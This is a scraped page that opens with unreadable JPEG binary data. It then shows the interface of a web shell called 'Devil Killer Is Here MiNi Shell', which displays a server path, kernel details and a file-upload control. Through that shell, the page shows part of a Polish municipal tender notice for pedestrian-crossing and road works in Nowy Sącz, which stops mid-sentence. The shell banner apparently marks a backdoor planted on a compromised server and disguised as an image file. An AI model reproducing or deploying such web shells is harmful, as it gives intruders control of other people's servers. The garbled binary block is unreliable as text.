JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210804/0013706101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00137061 z dnia 2021-08-04</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa bezpieczeństwa ruchu pieszych w obszarze oddziaływania przejść dla pieszych w mieście Nowy Sącz w 2021r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Zarząd Dróg w Nowym Sączu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 490580733</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wyspiańskiego 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowy Sącz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mzd.nowysacz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzd.nowysacz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa bezpieczeństwa ruchu pieszych w obszarze oddziaływania przejść dla pieszych w mieście Nowy Sącz w 2021r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2466957c-f530-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00137061</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002742/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.32 Poprawa bezpieczeństwa ruchu pieszych w obszarze oddziaływania przejść dla pieszych w mieście Nowy Sącz w 2021r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.mzd.nowysacz.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.mzd.nowysacz.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków<br/>o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków<br/>określonych w ustawie PZP., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. Ofertę, oświadczenia, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu<br/>udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach<br/>danych, w szczególności<br/>w formatach .txt, .rtf, .pdf, .doc, .docx, .odt.<br/>3. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują<br/>1) drogą elektroniczną na adres e-mail: sekretariat@mzd.nowysacz.pl<br/>2) za pośrednictwem elektronicznej platformy usług administracji publicznej obywatel.gov.pl na adres<br/>Miejski Zarząd Dróg 33 – 300 Nowy Sącz (/MZD/SkrytkaESP).<br/>3) poprzez platformę zakupowa pod adresem: www.platformazakupowa.pl<br/>4. Ofertę wraz z załącznikami, których Zamawiający wymaga do dołączenia do oferty, Wykonawcy<br/>składają za pośrednictwem Platformy pod adresem: www.platformazakupowa.pl<br/>5. Domniemywa się, że pismo wysłane przez Zamawiającego na numer faksu albo adres poczty e-mail<br/>podane przez wykonawcę (w ofercie) zostało mu doręczone w momencie jego przekazania przez<br/>Zamawiającego – dowód transmisji danych, w sposób umożliwiający zapoznanie się wykonawcy z jego<br/>treścią, chyba, że wykonawca wezwany przez Zamawiającego do potwierdzenia otrzymania<br/>oświadczenia, wniosku, zawiadomienia lub informacji w sposób określony powyżej oświadczy, iż w/w<br/>wiadomości nie otrzyma.<br/>6. Osobami upoważnionymi do porozumiewania się ze strony Zamawiającego są:<br/>1) Konrad Poręba</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.2.28.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I „Przebudowa drogi powiatowej nr 1600K w km od 0+100 do 0+250 w celu poprawy bezpieczeństwa ruchu pieszych w obszarze oddziaływania skrzyżowania ulicy Paderewskiego – Tarnowska <br/>i Rybacka w miejscowości Nowy Sącz, Miasto Nowy Sącz”<br/><br/>Zakres robót obejmuje m.in.:<br/>W zakresie Bezpieczeństwa Ruchu Drogowego (BRD):<br/>	Demontaż istniejących urządzeń sygnalizacji świetlnej (masztów sygnalizatorów przycisków dla pieszych, kamer, fundamentów itd. )<br/>	Wykonanie fundamentów pod konstrukcję wsporcze (maszty sygnalizacyjne MS oraz maszty sygnalizacyjne wysięgnikowe MSW),<br/>	Montaż fabrycznie nowych ocynkowanych ogniowo konstrukcji wsporczych MS i MSW,<br/>	Przebudowa i udrożnienie istniejącej kanalizacji kablowej sygnalizacji świetlnej,<br/>	Montaż sygnalizatorów: kołowych, pieszych , rowerowych i pieszo-rowerowych, sygnalizatorów warunkowego skrętu w prawo <br/>i ostrzegawczych ( z soczewkami bezbarwnymi i barwionymi źródłami światła),<br/>	Montaż ekranów kontrastowych, <br/>	Montaż i uruchomienie automatycznej detekcji pieszych i rowerzystów, <br/>	Montaż przycisków dla pieszych z potwierdzeniem ( wibracyjno – akustyczne ),<br/>	Montaż i uruchomienie wideodetekcji pojazdów ( detekcja powinna posiadać strukturę umożliwiać bieżący podgolą i zapis obrazu z kamer, logika systemu detekcji należy umieścić w szafie sterowniczej i zapewnić jej galwaniczną separację od kamer wideodetekcji),<br/>	Doposażenie sterownika sygnalizacji świetlnej umożliwiające obsługę wszystkich grup i systemów detekcji ( potoków ruchu), <br/>	Wgranie i uruchomienie nowego programu sygnalizacji świetlnej, <br/>	Uzupełnienie istniejącego okablowanie,<br/>	Montaż lamp doświetlających przejście dla pieszych,<br/>	Wykonanie niezbędnego okablowania do zasilania opraw doświetlających przejść dla pieszych, <br/>	Badania i pomiary,<br/>	Inne roboty niezbędne do wykonania zadania, <br/>	Oznakowanie poziome, grubowarstwowe przejść dla pieszych,<br/>	Oznakowanie cienkowarstwowe – odtworzenie,<br/>	Dostarczenie pełnej dokumentacji powykonawczej, <br/><br/>W zakresie wykonania robót przy ścieżce rowerowej:<br/>	wykonanie robót ziemnych,<br/>	rozbiórka istniejących krawężników betonowych,<br/>	wykonaniu podbudowy z kruszywa łamanego pod nawierzchnię ścieżki rowerowej,<br/>	wykonanie krawężników betonowych na ławie betonowej,<br/>	wykonanie obrzeży betonowych na ławie betonowej,<br/>	wykonanie palisady betonowej na ławie betonowej,<br/>	wykonanie nawierzchni z betonowej kostki integracyjnej przed przejściem dla pieszych,<br/>	wykonanie nawierzchni ścieżki rowerowej z betonowej kostki brukowej gr. 8cm na podsypce piaskowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233261-6 - Roboty budowlane w zakresie przejść dla pieszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">25.	Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa <br/>w art. 214 ust. 1 pkt 7 ustawy PZP, polegającego na powtórzeniu podobnych robót budowlanych. Całkowita wartość tego zamówienia wynosi:<br/>a.	Dla cz.I nie więcej niż 100 000,00 zł.<br/>26.	Zamówienie, o którym mowa w art.214 ust.1 pkt 7 ustawy PZP zostanie udzielone wykonawcy zamówienia podstawowego pod warunkiem, że:<br/>1)	Na dzień udzielenia zamówienia, wykonawca spełnia warunki udziału w postępowaniu, wskazane dla zamówienia podstawowego;<br/>2)	Nie podlega wykluczeniu z postępowania w trybie art. 108 ust.1 oraz art. 109 ust.1 pkt 1-5 i 7-10 ustawy PZP</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II „Przebudowa drogi gminnej nr 293199K w km od 0+100 do 0+250 w celu poprawy bezpieczeństwa ruchu pieszych w obszarze oddziaływania skrzyżowania ulicy Mickiewicza z Al. Wolności <br/>w miejscowości Nowy Sącz, Miasto Nowy Sącz”<br/><br/>Zakres robót obejmuje m.in.:<br/>W zakresie Bezpieczeństwa Ruchu Drogowego (BRD):<br/>	wykonanie dedykowanych oświetlenia dla pieszych na <br/>4 przejściach dla pieszych w obrębie skrzyżowania al. Wolności – Mickiewicza, w tym: <br/>o	ułożenia kabla ziemnego YAKY 4x35 mm2 <br/>o	zabezpieczenie projektowanych kabli rurami osłonowymi HDPE min fi 75 ( np. DVK 75),<br/>o	wykonanie przewiertu sterowanego pod jezdniami, <br/>o	wykonanie wykopów i rowów pod kanalizację kablową <br/>i fundamenty,<br/>o	układanie ręczne kabli wielożyłowych w rurach osłonowych HDPE<br/>o	wykonanie wlz-ów zasilających poszczególne oprawy,<br/>o	montaż typowych fundamentów prefabrykowanych do słupów wg. zaleceń producenta,<br/>o	montaż słupów oświetleniowych stalowych ocynkowanych <br/>o podwyższonej wytrzymałości o wysokości min. 5m wraz z odpowiednim wysięgnikiem,<br/>o	wykonanie zabezpieczenia antykorozyjnego słupa <br/>i fundamentu,<br/>o	montaż izolowanych złącz kablowych,<br/>o	montaż palczatek termokurczliwych,<br/>o	montaż opraw dedykowanych do oświetlenia przejścia dla pieszych,<br/>o	podłączenie do sieci oświetleniowej,<br/>o	wykonanie uziemienia<br/>o	wykonanie niezbędnych pomiarów i badań oraz innych czynności mających na celu sprawne funkcjonowanie ww. urządzeń,<br/>o	dostarczeniu pełnej dokumentacji powykonawczej, <br/>o	przygotowanie/pozyskanie dokumentacji technicznej zgodnie <br/>z obowiązującymi przepisami umożliwiającej wykonanie doświetlenia ww. przejść dla pieszych,<br/>	wymiana bariery łańcuchowej U-12b z uwagi na zły stan techniczny,<br/>	oznakowanie poziome, grubowarstwowe przejść dla pieszych,<br/>	oznakowanie poziome, cienkowarstwowe – odtworzenie po wykonaniu nawierzchni,<br/>	wykonanie aktywnego oznakowania pionowego <br/><br/>W zakresie wykonania nawierzchni chodnika:<br/>	wykonanie robót rozbiórkowych istniejącej nawierzchni z betonowej kostki brukowej, rozbiórce obrzeży oraz wykonaniu robót ziemnych,<br/>	wykonanie podbudowy z kruszywa łamanego pod nawierzchnię chodnika,<br/>	wykonanie obrzeży betonowych na ławie betonowej,<br/>	wykonanie nawierzchni z betonowej kostki integracyjnej przed przejściem dla pieszych na podsypce piaskowej,<br/>	wykonanie nawierzchni chodnika z betonowej kostki brukowej gr. 6cm na podsypce piaskowej.<br/><br/>W zakresie wykonania nawierzchni jezdni:<br/>	frezowanie nawierzchni – warstwy ścieralnej Al. Wolności na długości 25mb od krawędzi jezdni ul. Mickiewicza – jezdnia prawa <br/>i lewa,<br/>	wykonanie warstwy ścieralnej z betonu asfaltowego gr. 4cm </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233261-6 - Roboty budowlane w zakresie przejść dla pieszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">25.	Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa <br/>w art. 214 ust. 1 pkt 7 ustawy PZP, polegającego na powtórzeniu podobnych robót budowlanych. Całkowita wartość tego zamówienia wynosi:<br/>b.	Dla cz.II nie więcej niż 75 000,00 zł.<br/>26.	Zamówienie, o którym mowa w art.214 ust.1 pkt 7 ustawy PZP zostanie udzielone wykonawcy zamówienia podstawowego pod warunkiem, że:<br/>1)	Na dzień udzielenia zamówienia, wykonawca spełnia warunki udziału w postępowaniu, wskazane dla zamówienia podstawowego;<br/>2)	Nie podlega wykluczeniu z postępowania w trybie art. 108 ust.1 oraz art. 109 ust.1 pkt 1-5 i 7-10 ustawy PZP</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część III „Przebudowa drogi gminnej nr 293032K w km od 0+609,10 do 0+701,10 w celu poprawy bezpieczeństwa ruchu pieszych w obszarze oddziaływania skrzyżowania ulic Batalionów Chłopskich i Sucharskiego w miejscowości Nowy Sącz, Miasto Nowy Sącz”<br/><br/>Zakres robót obejmuje m.in:<br/>W zakresie Bezpieczeństwa Ruchu Drogowego (BRD):<br/>	Demontaż istniejących urządzeń sygnalizacji świetlnej ( masztów sygnalizatorów przycisków dla pieszych, kamer, fundamentów itd. ),<br/>	Wykonanie fundamentów pod konstrukcję wsporcze (maszty sygnalizacyjne MS oraz maszty sygnalizacyjne wysięgnikowe MSW),<br/>	Montaż fabrycznie nowych ocynkowanych ogniowo konstrukcji wsporczych MS i MSW, <br/>	Budowa /przebudowa i udrożnienie istniejącej kanalizacji kablowej sygnalizacji świetlnej,<br/>	Montaż sygnalizatorów: kołowych, pieszych , rowerowych i pieszo-rowerowych, sygnalizatorów warunkowego skrętu w prawo i ostrzegawczych ( z soczewkami bezbarwnymi i barwionymi źródłami światła). <br/>	Montaż ekranów kontrastowych, <br/>	Montaż sygnalizatorów akustycznych, <br/>	Montaż i uruchomienie automatycznej detekcji pieszych i rowerzystów, <br/>	Montaż przycisków dla pieszych z potwierdzeniem,<br/>	Montaż i uruchomienie wideodetekcji pojazdów ( detekcja powinna posiadać strukturę umożliwiać bieżący podgolą i zapis obrazu z kamer, logika systemu detekcji należy umieścić w szafie sterowniczej i zapewnić jej galwaniczną separację od kamer wideodetekcji ),<br/>	Wymiana istniejącego sterownika sygnalizacji świetlnej umożliwiające obsługę wszystkich grup ( potoków ruchu) i systemów, <br/>	Roboty ziemne, <br/>	Wgranie i uruchomienie nowego programu sygnalizacji świetlnej, <br/>	Uzupełnienie istniejącego okablowanie,<br/>	Montaż lamp doświetlających przejście dla pieszych, <br/>	Wykonanie niezbędnego okablowania do zasilania opraw doświetlających przejść dla pieszych, <br/>	Niezbędna dokumentacja,<br/>	Badania, pomiary , namiar geodezyjny powykonawczy,<br/>	Inne roboty niezbędne do wykonania zadania, <br/>	Wykonanie oznakowania poziomego i pionowego,<br/>	Dostarczeniu pełnej dokumentacji powykonawczej, <br/><br/>W zakresie wykonania nawierzchni jezdni:<br/>	4 cm w-wa ścieralna z betonu asfaltowego,<br/>	5 cm w-wa wiążąca z betonu asfaltowego,<br/>	7cm w-wa podbudowy zasadniczej z betonu asfaltowego,<br/>	20 cm podbudowa pomocnicza z kruszywa łamanego, <br/>	36 cm w-wa gruntu stabilizowanego cementem,<br/><br/>W zakresie wykonania nawierzchni chodnika:<br/>	nawierzchnia z kostki brukowej betonowej grubości 6 cm na podsypce piaskowej,<br/>	15cm podbudowa zasadnicza z kruszywa łamanego,<br/><br/>Przebudowa będzie polegała na rozebraniu istniejącej bitumicznej nawierzchni jezdni, chodników z kostki brukowej betonowej, wymianie krawężników, mechanicznym wykonaniu koryta pod warstwy konstrukcyjne a następnie wykonaniu przebudowy: jezdni i podbudowy zasadniczej bitumicznej, podbudowy pomocniczej z kruszywa łamanego oraz stabilizacji gruntu cementem, ścieku przykrawężnikowego z kostki granitowej 8/11 na ławie bet., przebudowy nawierzchni chodnika z kostki brukowej wraz z wykonaniem podbudowy z kruszywa łamanego. <br/><br/>Chodnik od strony jezdni będzie oddzielony krawężnikiem betonowym o wym. 15x30x100 cm posadowionym na ławie betonowej – przewidzianym do wymiany odcinkowo. Od strony zieleńców będzie wykonane obrzeże betonowe 